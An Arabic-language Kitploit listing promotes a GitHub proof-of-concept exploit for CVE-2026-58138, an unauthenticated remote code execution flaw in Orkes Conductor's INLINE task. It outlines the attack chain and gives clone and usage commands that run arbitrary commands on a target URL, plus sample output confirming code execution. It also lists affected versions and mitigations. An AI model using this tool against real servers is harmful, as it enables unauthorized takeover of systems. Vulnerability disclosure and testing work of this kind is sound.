Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) ثغرة RCE بدون مصادقة عبر مُقيّم GraalVM INLINE | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) ثغرة RCE بدون مصادقة عبر مُقيّم GraalVM INLINE

عرض المستودع
منذ 29 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) تنفيذ التعليمات البرمجية عن بُعد دون مصادقة

Orkes Conductor

ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Orkes Conductor

CVE Exploit Python


📋 نظرة عامة

CVE-2026-58138 هي ثغرة حرجة تتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة، وتؤثر على Orkes Conductor في الإصدارات من 3.21.21 حتى 3.30.1. تسمح هذه الثغرة للمهاجمين بتنفيذ أوامر عشوائية على خادم Conductor دون الحاجة إلى أي مصادقة، مما قد يؤدي إلى اختراق شامل للنظام.

🔴 الخطورة

  • درجة CVSS: 9.8 (حرجة)
  • متجه الهجوم: الشبكة
  • المصادقة: غير مطلوبة
  • التأثير: اختراق كامل للنظام

⚙️ تفاصيل الثغرة

توجد الثغرة في نوع مهمة INLINE داخل محرك سير العمل في Orkes Conductor. تدعم مهمة INLINE تنفيذ JavaScript مع الوصول إلى كائنات Java عبر eval، مما يسمح للمهاجم بما يلي:

  1. تسجيل سير عمل خبيث يحتوي على مهمة INLINE مع كود JavaScript
  2. تنفيذ كود Java عشوائي من خلال التشغيل البيني بين JavaScript وJava
  3. تشغيل أوامر النظام على خادم Conductor عبر java.lang.Runtime.exec()

📦 الإصدارات المتأثرة

نطاق الإصدارالحالة
3.21.21 - 3.30.1✅ مُتأثر
> 3.30.1❌ تم إصلاحه

🚀 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💻 الاستخدام

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 مثال على المخرجات

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ التخفيف

  1. قم بالترقية إلى Orkes Conductor 3.30.2 أو أحدث
  2. عطّل نوع مهمة INLINE إذا لم يكن مطلوبًا
  3. قيّد وصول الشبكة إلى واجهة Conductor API

⚠️ إخلاء المسؤولية

لأغراض تعليمية وبحوث أمنية فقط. استخدمها فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها.


📚 المراجع

  • NVD - CVE-2026-58138
  • أمان Orkes Conductor

⭐ هل وجدت هذا مفيدًا؟ امنحه نجمة على GitHub ⭐

GitHub stars

تنزيل الأداة